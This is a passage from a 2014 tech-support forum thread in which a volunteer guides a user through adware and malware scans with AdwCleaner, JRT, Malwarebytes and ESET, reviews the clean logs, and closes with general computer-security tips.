After the scan is complete click on "Clean"
Confirm each time with Ok.
Your computer will be rebooted automatically. A text file will open after the restart.
Please post the content of that logfile with your next answer.
You can find the logfile at C:\AdwCleaner[S1].txt as well.
NOTE: If you see AVG Secure Search being targeted for deletion, Here's Why and Here. You can always Reinstall it.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Please download Junkware Removal Tool to your desktop.

Shut down your protection software now to avoid potential conflicts.
Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8; instead of double-clicking, right-mouse click JRT.exe and select "Run as Administrator".
The tool will open and start scanning your system.
Please be patient as this can take a while to complete depending on your system's specifications.
On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
Post the contents of JRT.txt into your next message.

~~~~~~~~~~

Download Malwarebytes' Anti-Malware to your desktop.

Windows XP : Double click on the icon to run it.
Windows Vista, Windows 7 & 8 : Right click and select "Run as Administrator"

On the Dashboard click on Update Now
Go to the Setting Tab
Under Setting go to Detection and Protection
Under PUP and PUM make sure both are set to show Treat Dections as Malware
Go to Advanced setting and make sure Automatically Quarantine Detected Items is checked
Then on the Dashboard click on Scan
Make sure to select THREAT SCAN
Then click on Scan
When the scan is finished and the log pops up...select Copy to Clipboard
Please paste the log back into this thread for review
Exit Malwarebytes

please post
C:\AdwCleaner.txt
JRT.txt
MBAM log

How is the computer now?

**gludog** · 2014-12-18, 23:11

Thanks again for your help. The logs:

# AdwCleaner v4.105 - Report created 18/12/2014 at 15:10:42
# Updated 08/12/2014 by Xplode
# Database : 2014-12-16.1 [Live]
# Operating System : Windows 7 Professional Service Pack 1 (64 bits)
# Username : gluskid - GLUSKID-LT
# Running from : C:\Users\gluskid\Desktop\AdwCleaner.exe
# Option : Clean

***** [ Services ] *****

***** [ Files / Folders ] *****

***** [ Scheduled Tasks ] *****

***** [ Shortcuts ] *****

***** [ Registry ] *****

Key Deleted : [x64] HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}
Key Deleted : [x64] HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472F-A0FF-E1416B8B2E3A}

***** [ Browsers ] *****

-\\ Internet Explorer v11.0.9600.17041

-\\ Mozilla Firefox v32.0 (x86 en-US)

-\\ Google Chrome v39.0.2171.95

[C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://search.aol.com/aol/search?q={searchTerms}
[C:\Users\gluskid\AppData\Local\Google\Chrome\User Data\Default\Web Data] - Deleted [Search Provider] : hxxp://www.ask.com/web?q={searchTerms}

*************************

AdwCleaner[R0].txt - [1315 octets] - [18/12/2014 15:05:22]
AdwCleaner[S0].txt - [1236 octets] - [18/12/2014 15:10:42]

########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1296 octets] ##########

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Thisisu
Version: 6.4.0 (11.29.2014:1)
OS: Windows 7 Professional x64
Ran by gluskid on Thu 12/18/2014 at 16:37:52.13
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~ Services

~~~ Registry Values

~~~ Registry Keys

~~~ Files

~~~ Folders

~~~ Event Viewer Logs were cleared

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Thu 12/18/2014 at 16:43:42.98
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Malwarebytes Anti-Malware
www.malwarebytes.org

Scan Date: 12/18/2014
Scan Time: 3:52:26 PM
Logfile:
Administrator: Yes

Version: 2.00.4.1028
Malware Database: v2014.12.18.05
Rootkit Database: v2014.12.14.01
License: Trial
Malware Protection: Disabled
Malicious Website Protection: Disabled
Self-protection: Disabled

OS: Windows 7 Service Pack 1
CPU: x64
File System: NTFS
User: gluskid

Scan Type: Threat Scan
Result: Completed
Objects Scanned: 404646
Time Elapsed: 17 min, 54 sec

Memory: Enabled
Startup: Enabled
Filesystem: Enabled
Archives: Enabled
Rootkits: Enabled
Heuristics: Enabled
PUP: Enabled
PUM: Enabled

Processes: 0
(No malicious items detected)

Modules: 0
(No malicious items detected)

Registry Keys: 0
(No malicious items detected)

Registry Values: 0
(No malicious items detected)

Registry Data: 0
(No malicious items detected)

Folders: 0
(No malicious items detected)

Files: 0
(No malicious items detected)

Physical Sectors: 0
(No malicious items detected)

(end)

**Juliet** · 2014-12-18, 23:26

Tell me how the computer is at the moment.

What we can do now is run an online scan with Eset, for the time being it is our most trusted scanner.
Most reliable and thorough.
The settings I suggest will show us items located in quarantine folders so don't be alarmed with this, also, in case of a false positive I ask that you not allow it to delete what it does find.
This scanner can take quite a bit of time to run, depending of course how full your computer is.

Go here to run an online scannner from ESET. Windows Vista/Windows 7/Windows 8 users will need to right click on their Internet Explorer shortcut, and select Run as Administrator

Note:
For browsers other than Internet Explorer, you will be prompted to download and install esetsmartinstaller_enu.exe. Click on the link and save the file to a convenient location. Double click on it to install and a new window will open. Follow the prompts.
Turn off the real time scanner of any existing antivirus program while performing the online scan. Here's how.
Click the blue Run ESET Online Scanner button
Tick the box next to YES, I accept the Terms of Use.
Click Start
When asked, allow the program to install the "OnlineScanner.cab" activex control by clicking the Install button
Once the activex control is installed, on the next screen click on Enable detection of potentially unwanted applications
Click on Advanced Settings
Make sure that the option Remove found threats is unticked.
Ensure these options are ticked
- Scan archives
- Scan for potentially unsafe applications
- Enable Anti-Stealth technology
Click Start
Wait for the scan to finish
When the scan is done, if it shows a screen that says "Threats found!", then click "List of found threats", and then click "Export to text file..."
Save that text file on your desktop. Copy and paste the contents of that log as a reply to this topic.
Close the ESET online scan.

*************************************

**gludog** · 2014-12-19, 00:45

The Eset scan showed no threats.

**Juliet** · 2014-12-19, 00:59

Tell me how the computer is at the moment.

**gludog** · 2014-12-19, 02:42

I have tried various programs and everything seems normal.

**Juliet** · 2014-12-19, 11:35

DelFix

Please download DelFix and save the file to your Desktop.
Double-click DelFix.exe to run the programme.
Place a checkmark next to the following items:
- Activate UAC
- Remove disinfection tools
- Create registry backup
- Purge system restore
- Reset system settings
Click the Run button.

-- This will remove the specialised tools we used to disinfect your system. Any leftover logs, files, folders or tools remaining on your Desktop which were not removed can be deleted manually (right-click the file + delete).

~~~~~~~~~~~~~~~~~~

Your good to go, good job!

Please take the time to read over a few of my preventive tips.

Computer Security
http://malwareremoval.com/forum/view...557960#p557960
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Be prepared for CryptoLocker:

Cryptolocker Ransomware: What You Need To Know

CryptoLocker Ransomware Information Guide and FAQ

to help protect your computer in the future I recommend that you get the following free programmes:

CryptoPrevent install this programme to lock down and prevent crypto ransome ware

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Please navigate to Microsoft Windows Updates and download all the "Critical Updates" for Windows.

Firefox 3
The award-winning Web browser is now faster, more secure, and fully customizable to your online life. With Firefox 3, added powerful new features that make your online experience even better. It has more features and is a lot more secure than IE. It is a very easy and painless download and install, it will no way interfere with IE, you can use them both.
*NoScript - Addon for Firefox that stops all scripts from running on websites. Stops malicious software from invading via flash, java, javascript, and many other entry points.

AdblockPlus

AdblockPlus, Surf the web without annoying ads!
Blocks banners, pop-ups and video ads - even on Facebook and YouTube
Protects your online privacy
Two-click installation, It's free!
click the icon that corresponds to your browser and download.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
WOT Web of Trust, warns you about risky websites that try to scam visitors, deliver malware or send spam. Protect your computer against online threats by using WOT as your front-line layer of protection when browsing or searching in unfamiliar territory. WOT's color-coded icons show you ratings for 21 million websites - green to go, yellow for caution and red to stop, helping you avoid the dangerous sites. WOT has an addon available for both Firefox and IE.

Green should be good to go
Yellow for caution
Red to stop

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
How to prevent Malware: Created by Miekiemoes

WARNING: Java is the #1 exploited program at this time. The Department of Homeland Security recommends that computer users disable Java
See this article (http://www.forbes.com/sites/eliseack...-disable-java/
and this article (http://www.nbcnews.com/technology/te...late-1B7938755

I would recommend that you completely uninstall Java unless you need it to run an important software.
In that instance I would recommend that you disable Java in your browsers until you need it for that software and then enable it. (See How to diasble Java in your web browser (http://www.geekstogo.com/2600/how-to...r-web-browser/) and How to unplug Java from the browser (http://krebsonsecurity.com/how-to-un...m-the-browser/))

Avoid P2P

P2P may be a great way to get lots of stuffs, but it is a great way to get infected as well. There's no way to tell if the file being shared is infected. Worse still, some worms spread via P2P networks, infecting you as well.

Please read these short reports on the dangers of peer-2-peer programs and file sharing.

FBI Cyber Education Letter
USAToday
infoworld

*********************************************
Please read the following safe computing articles..

Secure My Computer: A Layered Approach

Free Antivirus-AntiSpyware-Firewall Software

Keep a backup of your important files - Now, more than ever, it's especially important to protect your digital files and memories. This article is full of good information on alternatives for home backup solutions.

It is possible for other programs on your computer to have security vulnerability that can allow malware to infect you.
Therefore, it is also a good idea to check for the latest versions of commonly installed applications that are regularly patched to fix vulnerabilities.
You can check these by visiting Secunia Software Inspector or you can use the following application for this purpose PatchMyPC

Thread: Slow laptop, Spybot and Malwarebytes have not found the issue

Thread Tools

Display

Slow laptop, Spybot and Malwarebytes have not found the issue

results

running good now

Computer is operating great

Running great.

Posting Permissions